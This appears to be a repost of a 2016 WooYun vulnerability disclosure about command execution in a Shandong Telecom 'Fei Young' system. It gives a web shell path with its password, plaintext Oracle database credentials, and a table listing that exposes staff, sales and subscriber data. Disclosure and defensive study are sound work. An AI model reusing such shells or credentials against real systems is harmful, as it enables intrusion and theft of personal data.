记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

电信天翼飞YOUNG某省系统漏洞(可影响全省代理信息/大量手机个人信息外泄/疑似可操作各种手机业务/信息数据泄露量惊人)

2016-02-22 19:10

**.**.**.**/portal/login!index.action?gotoUrl=**.**.**.**:8080/cys/index.htm



山东电信飞young创业社系统, **.**.**.**:8080 存在命令执行,通过对数据库的配置,获取到大量的数据,全省各市的业务代理,以及各级代理,还有各个校区以及校区代理的信息,泄露数据量十分惊人,而且可实时监控业务人个人信息以及盈利情况。





数据量过于庞大,只抽取部分作为证明。

code 区域
**.**.**.**:8080/CYSSMS/1.jsp carry

code 区域
ods.driverClassName=oracle.jdbc.driver.OracleDriver

ods.url=jdbc:oracle:thin:@**.**.**.**:1521:odsdb

ods.username=fyoung

ods.password=fyoung_123

数据库以及shell

code 区域
Query#0 : select t.TABLE_NAME,t.NUM_ROWS from user_tables t order by NUM_ROWS desc



TABLE_NAME

VARCHAR2NUM_ROWS

NUMBER

SEND_SMS

YOUNG_TEAM_INFO_HIS

TST_CYCLE

TEAM_WORKER_130820

TST_CYS

TST_CYS_LIST

TST_MEMBER_LIST

TST_LOGIN

TST_SALE_MONTH_LIST

YM_SEND_SMSINFO

YM_JF

CYS_JF

CYS_SEND_SMSINFO

LAN_AREA_INFO

SALE_INFO_130926

DOWN_LOAD_FILE

EXPORT_LOG

AREA

ACCOUNT_TYPE

AUTH_DATA

LIMIT_TYPE

LIMIT_INFO

MENU_INFO

BUTTON_INFO

CONN_PROTOCOL

DIME_URLE

DATA_RANGE

SYSTEM_INFO

SYS_MODULE

DIMENSION

IMPORT_ERROR

JOB

LIMIT_GROUP

JOB_2_LIMIT_GROUP

JOB_LIMIT

WORK_VIEW

JOB_WORK_VIEW

LIMIT_DIM

LIMIT_GROUP_2_LIMIT

ORG_JOB

ORG_OBJECT

ORG_O_GRADE

ORG_O_MODE

ORG_O_R_MAP

OUT_VIEW_2_VIEW_TYPE

OUT_VIEW_STATE

SYS_ORG

POSITION

POSITION_2_LIMIT_GROUP

POSITION_LIMIT

POSITION_RANGE

POSITION_WORK_VIEW

SQL_MAPPER

STAFF

STAFF_LOGIN_HIS

STAFF_NUMBER

SYS_LOG

SYS_MENU

SYS_ORG_ATTR

OUT_VIEW

SYS_HELP

VIEW_TYPE

WEB_APP_LOG

ATTACH_FILE

ATTACH_TYPE

OBJECT_ATTACH

YOUNG_TEAM_INFO

TEAM_WORKER

SCHOOL_INFO

TS_DIM

SYS_ORG_BAK

TMP_ALLUSER

SALE_INFO_140506

GERL_TMP

TMP_USER_CHARGE

TST_SALE_MONTH_SUM

TEAM_WORKER_140509

SALE_REPORT_LOG

SERV_INFO

AUDIT_LOG

TEMP_STAFF_TEAM_INFO

MENU_INFO_BAK

TEMP_STAFF_TEAM_INFO_HIS

TMP_SALE_INFO

SALE_INFO

AREA_140313

数据库结构

漏洞证明:

1111.png

1w.png

12w.png

xinxi.png

xinxi1.png

xinxi3.png

xinxi4.png

xinxi5.png

xinxi6.png

xinxi7.png

xinxi9.png

xinxi10.png

xinxi12.png

xinxi13.png

xinxi14.png

xinxi15.png

xinxi16.png

xinxi17.png

xinxi18.png

xinxi19.png

xinxi20.png

xinxi21.png

xinxi22.png

xinxi23.png

xinxi24.png

xinxi25.png

xinxi26.png

xinxi27.png

xinxi28.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0167842

阅读:85676 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“电信天翼飞YOUNG某省系统漏洞(可影响全省代理信息/大量手机个人信息外泄/疑似可操作各种手机业务/信息数据泄露量惊人)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词